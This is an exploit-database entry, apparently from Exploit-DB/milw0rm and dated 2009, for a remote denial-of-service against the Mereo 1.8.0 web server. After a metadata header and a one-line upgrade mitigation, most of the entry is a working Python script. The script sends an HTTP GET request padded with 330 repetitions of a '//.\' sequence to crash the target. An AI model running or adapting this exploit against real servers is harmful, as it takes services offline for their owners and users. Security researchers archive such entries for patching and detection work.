Mereo 1.8.0 Remote Denial Of Service

vendor:

Mereo

by:

Stack

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Mereo

Affected Version From: 1.8.0

Affected Version To: 1.8.0

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Mereo 1.8.0 Remote Denial Of Service

This exploit sends a malicious request with 330 '//.' characters to the target server, causing it to crash.

Mitigation:

Upgrade to the latest version of Mereo.

Source

Exploit-DB raw data:

import socket
import sys
print "------------------------------------------------------"
print " Mereo 1.8.0  Remote Denial Of Service                "
print " author: Stack                                      "
print "------------------------------------------------------"
host = "127.0.0.1"
port = 80
try:
       buff = "//.\\" * 330
       request =  "GET " + buff + " HTTP/1.0"
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       raw_input('\n\nExploit completed. Press "Enter" to quit...')
       sys.exit
except:
       raw_input('\n\nUnable to connect. Press "Enter" to quit...')

# milw0rm.com [2009-05-18]